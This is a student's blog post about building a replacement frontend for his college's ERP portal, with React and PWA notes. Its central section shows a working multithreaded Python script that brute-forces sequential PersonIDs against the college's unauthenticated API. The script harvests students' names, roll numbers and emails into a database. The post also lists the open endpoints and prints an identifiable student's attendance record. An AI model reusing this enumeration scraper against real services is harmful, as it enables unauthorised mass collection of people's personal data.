Title: DEVS COMPANION APP
Author: Raxen
Date: November 24, 2024

TABLE OF CONTENTS

REC COMPANION APP and how I OVERENGIEERED IT…

PREAMBLE

My college has switched their ERP solution to a new one. So, i think everything I say would be obsolute by the time I publish this blog. Thanks to this project I learnt about API protection, multithreading and agricutlure seems to be a easier field of work.

WHERE IT ALL STARTED

It was the year 2021 when i joined my college. I was very curious as to what all the stuff they had in the college. Once i finished my first internals. I was shocked to see that my results can be viewed in my college portal which was to be accessed through my college mail id. As a person with a very curious mindset. I got to work on how the backend API works. At that time I didn’t have that much knowledge regarding backend and frontend. I was into programming and mostly focused on leetcode and problem solving. I had some experience working with reverse engineering my school’s android application.

code lost in time sadly :(

Idea was to create a better frontned

I was using a lot of different frontend for popular applications that that time.

So i was thinking it would be cool if i could make a frontend for my college portal that didn’t suck.

REVERSE ENGINEERING

By 2022. I wanted to build a better portal for my peers because the official one from college was shit. The backend APIS had 0 authentication they queried and data was returned. It made it really easy to reverse engineer and build applications around it. In fact there was already an existing solution as a telegram bot. Okay, I should just use it and call it a day right. Wrong. I didn’t have telegram and using a telgram bot was unintutive and I really wanted it to be a standalone application or a website.

0 AUTHENTHICATION WAS DONE ON THE BACKEND

Just going through how the reqeusts work in Chrome/Firefox devtools. In the network tab i quickly found that they had 0 authentication for the api endpoints.

Network request to api endpoints in unified rec

By taking a closer look at the API call we can figure out we need PersonID set to our ID to get our results.

person_id

hmm… how can i get this personID. I mean surely If i make so much noise brute forcing it they will eventually find out and block me. I mean they surely have DDOS protections right… right… right..

NO DDOS PROTECTION

So, I was learning how to do multithreading at the time using python. I was sure to put my knowledge to the test by writing a quick multithreaded python script which i admit is soo fucking overkill.

full code at github

util/scraper.py

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
def add_user(unified_id, rollno, name, email):

    print(f"ADDING USER {rollno} {unified_id} {name} {email}")
    add_user_query = """
    INSERT INTO users (UNIFIED_ID, ROLLNO, NAME, EMAIL) values (%s,%s,%s,%s)
    """
    user_data = (unified_id, rollno, name, email)
    try:
        mycursor.execute(add_user_query, user_data)
        print(f'ADDED: {user_data}')
    except Exception as e:
        print(f"Error adding user {user_data}", e)

def make_request(payload):
    person_id = payload['PersonID']
    timeout = 60
    URL = 'http://rajalakshmi.in/UI/Modules/Profile/Profile.aspx/GetPersonInfo'
    try:
        response = requests.post(
            URL,
            json=payload,
            timeout=timeout,
        )
        response.raise_for_status()
        return person_id, response.status_code, response.json()
    except requests.exceptions.HTTPError as errh:
        return person_id, response.status_code, f"HTTP Error: {errh}"
    except requests.exceptions.ConnectionError as errc:
        return person_id, response.status_code, f"Error Connecting: {errc}"
    except requests.exceptions.Timeout as errt:
        return person_id, response.status_code, f"Timeout Error: {errt}"
    except requests.exceptions.RequestException as err:
        return person_id, response.status_code, f"Request Exception: {err}"

def minigun():
    list_of_users = []
    payloads = []
    for i in range(35000, 40000):
        # print(i)
        payloads.append(
            {
                'PersonID': i
            }
        )
    with concurrent.futures.ThreadPoolExecutor(max_workers=80) as executor:
        futures = {
            executor.submit(make_request, payload):
            payload for payload in payloads
        }

        count = 0
        total_count = 0
        for future in concurrent.futures.as_completed(futures):
            payload = futures[future]
            try:
                person_id, status_code, response = future.result()
                print(status_code)
                if status_code == 200:
                    list_of_users.append((person_id, response))
                    print("| FOUND USER: ", count,
                          "| TOTAL TRIES:", total_count, "|")
                    count += 1
            except Exception as e:
                print(
                    f"|PersonID: {person_id} \
                    | Payload: {payload} \
                    | Exception occurred: {e} |")

            total_count += 1

    count = 0
    for data in list_of_users:
        # person id
        person_id = data[0]
        # DATA
        details = data[1]['d']
        details = json.loads(details)
        # roll number
        try:
            rollnumber = details[0]['RollNumber']
        except KeyError:
            rollnumber = 0
        try:
            email = details[0]['CollegeEmail']
        except KeyError:
            email = ""
        # Name
        try:
            name = details[0]['Name'].strip('\t').replace(
                '\t', '').replace('..', '.').replace('  ', ' ')
        except Exception as e:
            print("Exception raised!", e)
            name = ""
        add_user(person_id, rollnumber, name, email)

        if count % 100 == 0:
            mydb.commit()
        count += 1

    mydb.commit()
    mydb.close()

On a high level how it works is scraper.py -> will create a shit ton of threads Each thread will create a request with a different personID and it will wait till the promise is resolved once it gets a response from the server either personIDis valid or invalid. if the personID is valid it will get added to the DB

PROBLEMS

if the program freezes or my computer dies the DB data is lost as it wasn’t commited. So, i added so that every 100 person id it will commit to the database. So, it is easier to recover from crashes.

It was all hacky and done in 30 min. sooo, I know it can be optimized but it was a fire once a year kind of script and i didn’t bother optimizing it that much.

TIME TO GET DATA FROM ENDPOINTS

For some odd reason every endpoint except the attendance and sem results is unprotected, we will get back to those endpoints later for now

/get-info/photo/<int:rollno>

/get-info/<int:rollno>

/internal-marks/<int:rollno>

OLD UNIFIED

old-unified-marks

NEW AND IMPROVED

new-devs-companion

/get-sems/<int:rollno>

/sem-marks/<int:rollno>/

/sem-marks/<int:rollno>/<int:sem>

/get-attendacne/<int:rollno>/

1
2
3
4
5
  json_data = {
    "StartDate": st_date,
    "EndDate": today,
    "PersonID": person_id,
}

and will return

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
[{'ABSENT': 53,
 'AttendanceDate': '22-01-2024',
 'NOTENTER': 0,
 'Name': 'RITHESH  S',
 'P1': None,
 'P2': 'A',
 'P3': 'P',
 'P4': None,
 'P5': 'P',
 'P6': None,
 'P7': None,
 'P8': None,
 'PRESENT': 355,
 'Percentage': 87.0,
 'Period1': '-NE-',
 'Period2': 'A- (IT19642)',
 'Period3': 'P- (IT19643)',
 'Period4': '-NE-',
 'Period5': 'P- (IT19643)',
 'Period6': '-NE-',
 'Period7': '-NE-',
 'Period8': '-NE-',
 'PersonId': 21412,
 'RollNumber': '211001084',
 'TDAYS': 316,
 'TotalAttennd': 408},
{'ABSENT': 53,
 'AttendanceDate': '23-01-2024',
 'NOTENTER': 0,
 'Name': 'RITHESH  S',
 'P1': 'A',
 'P2': 'A',
 'P3': 'P',
 'P4': 'A',
 'P5': 'P',
 'P6': 'A',
 'P7': 'P',
 'P8': None,
 'PRESENT': 355,
 'Percentage': 87.0,
 'Period1': 'A- (IT19P65)',
 'Period2': 'A- (IT19P65)',
 'Period3': 'P- (IT19644)',
 'Period4': 'A- (IT19642)',
 'Period5': 'P- (IT19644)',
 'Period6': 'A- (IT19642)',
 'Period7': 'P- (IT19641)',
 'Period8': '-NE-',
 'PersonId': 21412,
 'RollNumber': '211001084',
 'TDAYS': 316,
 'TotalAttennd': 408}
]

ACHIEVED FEATURE PARITY WITH OFFICIAL UNIFIED 🎉🎉🎉

This took about 2 years in the making, I worked on this project on and off as it was really my first real passion project. I learnt a lot. This project will always be in my heart

It was active for around 2 months then which we were running out of money for the server and we pulled the plug and subsequently new ERP came

3,000 USERS within 1 months only using word of mouth

we didn’t have analytics running for a month. So, the true numbers maybe above 3K

I would have missed a lot of things since this project was a long time in the making i didn’t document a lot of cool shit contact me if you wanna know more.

2nd part of the puzzle the frontend

I decided to go with React + NextUI cause why not. I also really wanted my application to be a PWA.

Frontend

components used

for local testing i needed this in my middleware.js

1
2
3
4
5
6
7
8
const proxy = require('http-proxy-middleware');

module.exports = function(app) {
  app.use(proxy('/api', {
    target: 'http://backend:9000',
    pathRewrite: {'^/api' : ''}
  }));
};

PWA

Somehow i got the Progressive Web Apps to work and using a caching method which made it so that user won’t send request to the server everytime they want something instead requests will be cached and be reused and only when needed network requests are done

PLEASE DO NOT DO THIS READ PWA DOCS AND USER SERVICE WORKERS TO PROPERLY CACHE THINGS

1
2
3
4
5
6
7
8
useEffect(() => {
if (localStorage.getItem("JWT_TOKEN") === null) {
  console.log("NOT LOGGED IN");
  navigate("/login");
} else {
  setToken(localStorage.getItem("JWT_TOKEN"));
}
}, []);

the nightmare continues

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
if (token !== "") {
  if(localStorage.getItem('sem-marks') === null){
    axios.defaults.headers.common['Authorization'] = `Bearer ${token}` 
    const url = `/api/sem-marks/`;
    axios
      .get(url, {})
      .then(function(response) {
        setData(response.data);
        localStorage.setItem('sem-marks', JSON.stringify(response.data));
        console.log("grade:", data);
      })
      .catch(function(error) {
        console.log(error);
        localStorage.clear();
        navigate("/login");
      });
  }
  else{
    setData(JSON.parse(localStorage.getItem("sem-marks")));

i later learnt this was not how it was supposed to be done sw.js can do it so whenever we use fetch it does a custom functions But everything worked having old unified as benchmark. Anything was better Great success

SCREENSHOTS

OLD - UNIFIED

unified-login

unified-homepage

unified-marks

NEW - DEVS COMPANION APP

devs-companion-login

oauth

homgpage-made-by-vignesh

attendance

rectransport

sem-marks

internal-marks

events-page-made-by-thiru

360-page-made-by-swayam

WON DESIGN THINKING

design thinking won 2nd place

CONCLUSION

As a project lead for the first technical club of REC. It was such a pleasure to colloborate with everyone and learn together. To more in the future

GITHUB LINK TO THE PROJECT

learn more about DEVSREC